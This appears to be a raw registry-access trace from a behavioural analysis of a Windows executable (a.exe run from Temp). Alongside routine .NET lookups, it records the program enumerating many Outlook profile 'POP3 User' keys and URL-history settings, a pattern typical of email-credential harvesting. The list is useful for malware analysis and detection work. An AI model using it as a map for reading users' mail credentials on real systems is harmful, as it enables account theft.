HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61\1fd2b021
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|a.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|a.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|a.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.6.0.Newtonsoft.Json__30ad4fe6b2a6aeed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3175ab79\8eb3a7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bab48f9\3a445bf6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bab48f9\2fbe3983
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\a.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\102652FB
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
